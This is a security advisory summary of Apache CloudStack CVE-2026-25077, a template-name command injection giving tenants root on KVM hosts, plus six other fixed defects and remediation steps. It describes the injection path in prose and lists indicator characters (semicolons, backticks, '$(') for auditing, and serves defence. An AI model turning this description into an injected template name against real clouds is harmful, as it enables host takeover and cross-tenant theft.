Apache CloudStack CVE-2026-25077: Malicious Template Lands Code Execution on KVM Hosts

Apache CloudStack pushed two emergency LTS releases on May 8, 2026 — 4.20.3.0 and 4.22.0.1 — that close a cluster of seven security defects across the orchestrator, its backup plugin, MinIO object storage integration, the new Proxmox extension, and the resource-quota path. The release that matters most is CVE-2026-25077, a template-registration flaw that converts any authenticated CloudStack account user into a code-executing tenant on the underlying KVM hypervisor host.

What happened

CloudStack lets account users register VM templates that are downloaded directly to primary storage for KVM deployments. The download path does not sanitize the supplied template file name. An attacker with a normal CloudStack account can register a template whose name contains shell metacharacters or path components, and when the management server stages it to a KVM host the unsanitized name is interpolated into a host-side command, executing arbitrary code as the user that runs the KVM agent — typically root.

The Apache advisory characterizes the impact as a full compromise of “resource integrity and confidentiality, data loss, denial of service, and availability of the KVM-based infrastructure managed by CloudStack.” In practical terms: a low-privileged tenant gets a root shell on the box hosting the cluster’s VMs. From there, attackers can read every neighbor tenant’s disks, modify libvirt config, drop persistence in /etc, and pivot into the management plane.

CVE-2026-25077 is filed as CWE-94 (Improper Control of Generation of Code) and was published 2026-05-08.

What else is in the release

The same LTS bump fixes six more issues that are individually less severe but matter together:

• Backup plugin cross-tenant disclosure (4.21.0.0, 4.22.0.0): Improper authorization on the backup API lets any authenticated user list backups belonging to any other account in the environment.
• MinIO bucket policy carryover: Bucket deletion does not purge the associated MinIO policy. A second user who later creates a bucket with the same name inherits the old policy and any access it granted.
• Resource-quota TOCTOU race: Multiple time-of-check / time-of-use races in the resource counting logic let a tenant exceed configured CPU, memory, and storage caps, with obvious DoS implications against shared infrastructure.
• Proxmox extension cross-tenant access: The Proxmox integration honors a user-editable proxmox_vmid setting without verifying tenant ownership, so an attacker can reference and manipulate VMs that belong to another account.
• External-integration policy weaknesses: The advisory cites additional security-policy handling weaknesses in the external-integration surface; review the upstream notes if you run the new external workload connectors.

Who is affected

If you operate any version of Apache CloudStack with KVM hypervisor hosts and you allow account users to register templates (the default), you are exposed to CVE-2026-25077. The backup, MinIO, and Proxmox issues apply selectively to 4.21.0.0 and 4.22.0.0, but the template flaw cuts across the supported tree.

CloudStack is widely deployed by hosters, telcos, and on-prem private cloud builds — the kind of environments where multi-tenant isolation is the entire point. A tenant-to-host escape is the worst-case outcome for that architecture.

What to do right now

1. Upgrade. Move to 4.20.3.0 (LTS) or 4.22.0.1. The Apache project and ShapeBlue both have release notes; the upgrade is straightforward management-server then agent.
2. Until you patch, disable user template registration. Restrict template registration to admin accounts, or quarantine the KVM zones from untrusted tenants.
3. Audit recent template registrations. Any template name containing shell metacharacters, semicolons, backticks, $(, or directory traversal sequences is suspicious. Look in the management-server DB (vm_template table) and on KVM hosts for unexpected files in the secondary/primary storage staging paths.
4. Rotate credentials reachable from a compromised KVM host. That means libvirt creds, any cluster service accounts staged on the host, and any SSH keys present in agent runtime.
5. If you run the Proxmox extension or the backup plugin on 4.21/4.22, treat those as separately exploitable and re-audit cross-tenant API logs.

Sources

• Apache CloudStack LTS Security Advisory 4.20.3.0 / 4.22.0.1
• ShapeBlue Security Advisory: CloudStack 4.20.3.0 and 4.22.0.1
• CVE-2026-25077 record (ThreatINT)